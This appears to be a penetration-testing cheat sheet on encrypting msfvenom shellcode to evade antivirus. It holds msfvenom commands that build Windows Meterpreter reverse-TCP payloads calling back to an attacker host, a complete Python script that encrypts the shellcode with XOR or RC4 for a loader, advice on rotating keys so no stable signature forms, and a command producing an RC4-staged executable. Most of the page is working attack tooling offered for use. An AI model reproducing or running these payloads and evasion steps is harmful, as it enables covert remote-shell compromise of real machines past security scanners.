Encryption Overview

Three common methods to encrypt msfvenom shellcode so that a static AV scanner does not see the plaintext stager (the loader decrypts it in memory before execution):

Method  Complexity  Detection rate  Notes
XOR     Low         Medium          Simple but effective with a random multi-byte key; a single-byte key is brute-forced in 256 tries and preserves byte statistics
RC4     Medium      Lower           Stream cipher, harder to signature
AES     High        Lowest          msfvenom can emit it via --encrypt aes256 (with --encrypt-key / --encrypt-iv); the decrypting loader is still yours to write

Generate base payload for encryption

# Raw shellcode to encrypt externally
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o sc.bin

# C array to paste into encrypt script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f c
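The "encrypt script" the C output above is meant to be pasted into, as an added example (not part of the original page or of msfvenom): it takes the raw sc.bin from the first command, applies either repeating-key XOR or RC4 with a random key, and prints both the key and the ciphertext as C arrays for a loader. Both ciphers are symmetric, so the loader decrypts by running the same routine over the buffer. The script name encrypt_sc.py, the array names key/buf and the command-line layout are assumptions for this example; the RC4 routine is the textbook KSA/PRGA, implemented here because Python ships no RC4.

```python
# Added example: XOR / RC4 post-processing of msfvenom raw shellcode.
# Script name, array names and CLI layout are assumptions, not msfvenom's.
import os
import sys


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric: the same call with the same key decrypts.
    Use a random multi-byte key; a single-byte key is brute-forced by scanners
    in 256 tries and leaves the plaintext's byte statistics intact."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def rc4_crypt(data: bytes, key: bytes) -> bytes:
    """RC4 keystream XORed over data. Symmetric (encrypt == decrypt).
    Good enough to hide bytes from a static scanner; not a secure cipher."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    # Key-scheduling algorithm (KSA): permute S under the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA): one keystream byte per input byte
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def to_c_array(name: str, data: bytes, per_line: int = 12) -> str:
    """Render bytes as a C unsigned char array ready to paste into a loader."""
    lines = []
    for off in range(0, len(data), per_line):
        chunk = data[off:off + per_line]
        lines.append("    " + ", ".join(f"0x{b:02x}" for b in chunk) + ",")
    body = "\n".join(lines)
    return f"unsigned char {name}[{len(data)}] = {{\n{body}\n}};"


def encrypt_shellcode(sc: bytes, method: str, key: bytes) -> bytes:
    """Dispatch on the method name used in the table above."""
    if method == "xor":
        return xor_encrypt(sc, key)
    if method == "rc4":
        return rc4_crypt(sc, key)
    raise ValueError(f"unknown method {method!r}")


def main(argv):
    # Usage (assumed): python encrypt_sc.py sc.bin xor|rc4 [keylen]
    path, method = argv[1], argv[2]
    keylen = int(argv[3]) if len(argv) > 3 else 16
    with open(path, "rb") as f:
        sc = f.read()
    key = os.urandom(keylen)          # fresh random key per build
    enc = encrypt_shellcode(sc, method, key)
    # Sanity check: decrypting with the same key must give the original bytes
    assert encrypt_shellcode(enc, method, key) == sc
    print(to_c_array("key", key))
    print(to_c_array("buf", enc))


if __name__ == "__main__":
    main(sys.argv)
```

The loader side mirrors this: for XOR it is a loop of `buf[i] ^= key[i % sizeof key]` before the memory is marked executable; for RC4 the same KSA/PRGA in C. Regenerate the key on every build so the ciphertext itself never becomes a stable signature.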

msfvenom built-in encrypted transport

# RC4-encrypted staging: the stager fetches the Meterpreter stage over an
# RC4-encrypted TCP channel, so the stage is not sent in the clear. Set the
# same RC4PASSWORD on the handler. This does not encrypt the stager inside the
# exe, so the file on disk is still exposed to static signatures on the
# msfvenom template. (x86 shown; windows/x64/meterpreter/reverse_tcp_rc4 is
# the 64-bit equivalent.)
msfvenom -p windows/meterpreter/reverse_tcp_rc4 \
  LHOST=<ip> LPORT=4444 RC4PASSWORD=MyKey -f exe > rc4_shell.exe